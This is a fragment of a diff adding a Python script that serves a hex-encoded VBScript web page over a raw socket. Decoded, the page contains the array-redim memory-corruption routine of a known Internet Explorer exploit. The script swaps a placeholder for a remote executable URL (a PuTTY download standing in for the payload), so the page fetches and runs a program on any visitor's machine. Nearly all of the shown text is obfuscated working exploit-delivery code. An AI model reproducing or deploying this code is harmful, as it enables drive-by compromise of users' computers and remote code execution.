+           "\x6e\x64\x20\x69\x66\x0d\x0a\x20\x20\x20\x20\x65\x6e\x64\x20\x69\x66\x0d\x0a\x20\x20\x20\x20\x20"
+           "\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x0d\x0a\x20\x20\x20\x20\x20\x0d\x0a\x20\x20\x20\x20\x49"
+           "\x66\x28\x74\x79\x70\x65\x31\x3d\x26\x68\x32\x66\x36\x36\x29\x20\x54\x68\x65\x6e\x20\x20\x20\x20"
+           "\x20\x20\x20\x20\x20\x0d\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x4f\x76\x65\x72\x3d\x54\x72"
+           "\x75\x65\x20\x20\x20\x20\x20\x20\x0d\x0a\x20\x20\x20\x20\x45\x6e\x64\x20\x49\x66\x20\x20\x0d\x0a"
+           "\x20\x20\x20\x20\x49\x66\x28\x74\x79\x70\x65\x31\x3d\x26\x68\x42\x39\x41\x44\x29\x20\x54\x68\x65"
+           "\x6e\x0d\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x4f\x76\x65\x72\x3d\x54\x72\x75\x65\x0d\x0a"
+           "\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x77\x69\x6e\x39\x78\x3d\x31\x0d\x0a\x20\x20\x20\x20\x45"
+           "\x6e\x64\x20\x49\x66\x20\x20\x0d\x0a\x20\x0d\x0a\x20\x20\x20\x20\x72\x65\x64\x69\x6d\x20\x20\x50"
+           "\x72\x65\x73\x65\x72\x76\x65\x20\x61\x61\x28\x61\x30\x29\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20"
+           "\x0d\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x0d\x0a\x65\x6e\x64\x20\x66\x75\x6e\x63\x74\x69\x6f"
+           "\x6e\x0d\x0a\x20\x0d\x0a\x66\x75\x6e\x63\x74\x69\x6f\x6e\x20\x72\x75\x6d\x28\x61\x64\x64\x29\x20"
+           "\x0d\x0a\x20\x20\x20\x20\x4f\x6e\x20\x45\x72\x72\x6f\x72\x20\x52\x65\x73\x75\x6d\x65\x20\x4e\x65"
+           "\x78\x74\x0d\x0a\x20\x20\x20\x20\x72\x65\x64\x69\x6d\x20\x20\x50\x72\x65\x73\x65\x72\x76\x65\x20"
+           "\x61\x61\x28\x61\x32\x29\x20\x20\x0d\x0a\x20\x20\x20\x0d\x0a\x20\x20\x20\x20\x61\x62\x28\x30\x29"
+           "\x3d\x30\x20\x20\x20\x0d\x0a\x20\x20\x20\x20\x61\x61\x28\x61\x31\x29\x3d\x61\x64\x64\x2b\x34\x20"
+           "\x20\x20\x20\x20\x0d\x0a\x20\x20\x20\x20\x61\x62\x28\x30\x29\x3d\x31\x2e\x36\x39\x37\x35\x39\x36"
+           "\x36\x33\x33\x31\x36\x37\x34\x37\x45\x2d\x33\x31\x33\x20\x20\x20\x20\x20\x20\x20\x0d\x0a\x20\x20"
+           "\x20\x20\x72\x75\x6d\x3d\x6c\x65\x6e\x62\x28\x61\x61\x28\x61\x31\x29\x29\x20\x20\x0d\x0a\x20\x20"
+           "\x20\x20\x0d\x0a\x20\x20\x20\x20\x61\x62\x28\x30\x29\x3d\x30\x0d\x0a\x20\x20\x20\x20\x72\x65\x64"
+           "\x69\x6d\x20\x20\x50\x72\x65\x73\x65\x72\x76\x65\x20\x61\x61\x28\x61\x30\x29\x0d\x0a\x65\x6e\x64"
+           "\x20\x66\x75\x6e\x63\x74\x69\x6f\x6e\x0d\x0a\x20\x0d\x0a\x3c\x2f\x73\x63\x72\x69\x70\x74\x3e\x0d"
+           "\x0a\x20\x0d\x0a\x3c\x2f\x62\x6f\x64\x79\x3e\x0d\x0a\x3c\x2f\x68\x74\x6d\x6c\x3e")
+    hesam="HTTP/1.1 200 OK\n"+"Content-Type: text/html\n"+"\n"+hesam
+    http_response = hesam.replace("FILE_DOWNLOAD","http://the.earth.li/~sgtatham/putty/latest/x86/putty.exe")#exe link
+    client_connection.sendall(http_response)
+    client_connection.close()
\ No newline at end of file